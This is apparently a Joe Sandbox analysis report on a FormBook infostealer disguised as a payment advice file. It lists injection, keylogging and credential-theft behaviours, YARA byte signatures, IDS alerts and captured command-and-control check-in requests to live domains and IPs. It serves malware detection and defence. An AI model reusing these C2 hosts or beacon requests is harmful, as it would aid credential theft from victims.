Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT ADVISE#9879058.exe

Overview

General Information

Sample name:PAYMENT ADVISE#9879058.exe
Analysis ID:1530635
MD5:e4e701c5d72fe6e72d12c76b44b7436b
SHA1:96828696a33ba584ea0346dcf7b7f4de19eff9b3
SHA256:24425aff6c4937fb1b26f04ded8069e7efc4873dbd2fe5c205c52181d8e9ba4e
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PAYMENT ADVISE#9879058.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe" MD5: E4E701C5D72FE6E72D12C76B44B7436B)
    • svchost.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eYlgnnKYnAjqSS.exe (PID: 1104 cmdline: "C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • NETSTAT.EXE (PID: 7376 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • eYlgnnKYnAjqSS.exe (PID: 2088 cmdline: "C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x396a1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x217d0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1411f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e943:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16a72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f743:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", CommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", ParentImage: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe, ParentProcessId: 7688, ParentProcessName: PAYMENT ADVISE#9879058.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", ProcessId: 7728, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", CommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", ParentImage: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe, ParentProcessId: 7688, ParentProcessName: PAYMENT ADVISE#9879058.exe, ProcessCommandLine: "C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe", ProcessId: 7728, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T10:08:18.483326+020028554651A Network Trojan was detected192.168.2.44990762.149.128.4080TCP
            2024-10-10T10:08:42.116891+020028554651A Network Trojan was detected192.168.2.450006203.161.43.24580TCP
            2024-10-10T10:08:55.807280+020028554651A Network Trojan was detected192.168.2.450010104.21.11.3180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-10T10:08:34.440731+020028554641A Network Trojan was detected192.168.2.450003203.161.43.24580TCP
            2024-10-10T10:08:37.020990+020028554641A Network Trojan was detected192.168.2.450004203.161.43.24580TCP
            2024-10-10T10:08:39.615822+020028554641A Network Trojan was detected192.168.2.450005203.161.43.24580TCP
            2024-10-10T10:08:48.100718+020028554641A Network Trojan was detected192.168.2.450007104.21.11.3180TCP
            2024-10-10T10:08:50.709021+020028554641A Network Trojan was detected192.168.2.450008104.21.11.3180TCP
            2024-10-10T10:08:53.310542+020028554641A Network Trojan was detected192.168.2.450009104.21.11.3180TCP
            2024-10-10T10:09:01.906668+020028554641A Network Trojan was detected192.168.2.450011154.23.184.24080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: chalet-tofane.netVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for submitted file
            Source: PAYMENT ADVISE#9879058.exeReversingLabs: Detection: 26%
            Source: PAYMENT ADVISE#9879058.exeVirustotal: Detection: 28%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2959379992.00000000011A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342184824.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2958344133.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959484035.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2959545540.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2341550139.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2342246132.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2959632438.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PAYMENT ADVISE#9879058.exeJoe Sandbox ML: detected
            Source: PAYMENT ADVISE#9879058.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: netstat.pdbGCTL source: svchost.exe, 00000001.00000003.2310699924.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000002.2958989075.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netstat.pdb source: svchost.exe, 00000001.00000003.2310699924.000000000301A000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000005.00000002.2958989075.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eYlgnnKYnAjqSS.exe, 00000005.00000000.2255485457.00000000002EE000.00000002.00000001.01000000.00000005.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000002.2958341376.00000000002EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734554493.0000000004620000.00000004.00001000.00020000.00000000.sdmp, PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734731744.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2236283658.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2238093908.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.0000000003700000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2343943133.000000000376B000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2341951806.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003920000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734554493.0000000004620000.00000004.00001000.00020000.00000000.sdmp, PAYMENT ADVISE#9879058.exe, 00000000.00000003.1734731744.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2341839749.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2236283658.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2238093908.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2341839749.0000000003700000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000006.00000003.2343943133.000000000376B000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000003.2341951806.00000000035BB000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003920000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2959757865.0000000003ABE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: NETSTAT.EXE, 00000006.00000002.2960171619.0000000003F4C000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2958501115.000000000317E000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409776057.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001A4AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: NETSTAT.EXE, 00000006.00000002.2960171619.0000000003F4C000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000006.00000002.2958501115.000000000317E000.00000004.00000020.00020000.00000000.sdmp, eYlgnnKYnAjqSS.exe, 00000007.00000000.2409776057.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2687690315.000000001A4AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_030FC510 FindFirstFileW,FindNextFileW,FindClose,6_2_030FC510
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then xor eax, eax6_2_030E9B10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then mov ebx, 00000004h6_2_037004DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49907 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50005 -> 203.161.43.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50004 -> 203.161.43.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50003 -> 203.161.43.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50006 -> 203.161.43.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 104.21.11.31:80
            Uses netstat to query active network connections and open ports
            Source: C:\Program Files (x86)\XLTCSewxDUMLdikaPXcOZYCoqtmGBvvhnUXiYckHGzcCnXzSTMhVbViDzubQxfnbEGSspn\eYlgnnKYnAjqSS.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
            Source: Joe Sandbox ViewIP Address: 203.161.43.245 203.161.43.245
            Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /w5h3/?xNv=1SmCwmpOaIYJfuspvbmYENxQiVuKofAafkRqArhwQnoekPS2kKO+Sw+l3ZpIkD6/zHiqkZCr31NVHRkc0KhHMBZH6coriNZLnk7PgxLNtl8YZG6QQCHD2lU=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
            Source: global trafficHTTP traffic detected: GET /fes8/?xNv=cTPMtmydtIOcZN1EpbOznD6DHSF1GJA5rrzAazo95AkGy7xpXMeTb2ED7e9G6zC4vj43JKFjl9b/uRwCEgcjRW9DYZ4o78I1UccG1j+HCTKiHQxKTun3ViY=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1Host: www.healtpro.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
            Source: global trafficHTTP traffic detected: GET /3rsv/?xNv=xIX+WL4Gosls7mMvG39YjczwIlc5FH+9QHTcqjrnYPts9+3MRA8haYPK8pqgYSQnqVoX+MtR4yK2qH2ERM2vlkvqHJkEK2jfahGH5woqObRGQGud+bD1SW8=&xh-d=eNF4ktDXSL5XRvo HTTP/1.1Host: www.b5x7vk.agencyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
            Source: global trafficDNS traffic detected: DNS query: www.healtpro.top
            Source: global trafficDNS traffic detected: DNS query: www.b5x7vk.agency
            Source: global trafficDNS traffic detected: DNS query: www.wcq24.top
            Source: unknownHTTP traffic detected: POST /fes8/ HTTP/1.1Host: www.healtpro.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.healtpro.topContent-Length: 200Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.healtpro.top/fes8/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A405Data Raw: 78 4e 76 3d 52 52 6e 73 75 52 71 51 37 49 48 42 55 4e 52 37 33 5a 71 65 74 53 7a 43 61 44 70 35 4a 4f 64 4a 37 71 58 56 4b 67 70 4d 33 6b 45 73 68 6f 70 7a 62 50 2f 50 55 52 51 30 78 2b 59 30 79 54 6d 74 69 48 73 72 61 70 4e 6b 7a 74 66 66 74 69 68 4b 55 67 68 6b 4f 53 70 39 58 5a 59 56 37 39 4d 6a 65 4b 6b 42 2b 6c 72 57 54 30 57 75 62 51 5a 63 57 64 2b 77 4b 67 72 53 6d 39 49 6c 41 4d 48 30 46 4e 61 69 5a 72 50 72 6f 50 42 63 74 41 58 50 69 4e 46 72 4f 33 50 55 44 64 78 44 56 6c 33 50 2f 65 39 66 68 6f 4d 44 36 38 2b 79 77 43 4f 47 79 63 76 50 4d 39 4b 32 59 32 49 50 47 7a 4d 79 48 67 3d 3d Data Ascii: xNv=RRnsuRqQ7IHBUNR73ZqetSzCaDp5JOdJ7qXVKgpM3kEshopzbP/PURQ0x+Y0yTmtiHsrapNkztfftihKUghkOSp9XZYV79MjeKkB+lrWT0WubQZcWd+wKgrSm9IlAMH0FNaiZrProPBctAXPiNFrO3PUDdxDVl3P/e9fhoMD68+ywCOGycvPM9K2Y2IPGzMyHg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 10 Oct 2024 08:08:18 GMTConnection: closeContent-Length: 5103Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 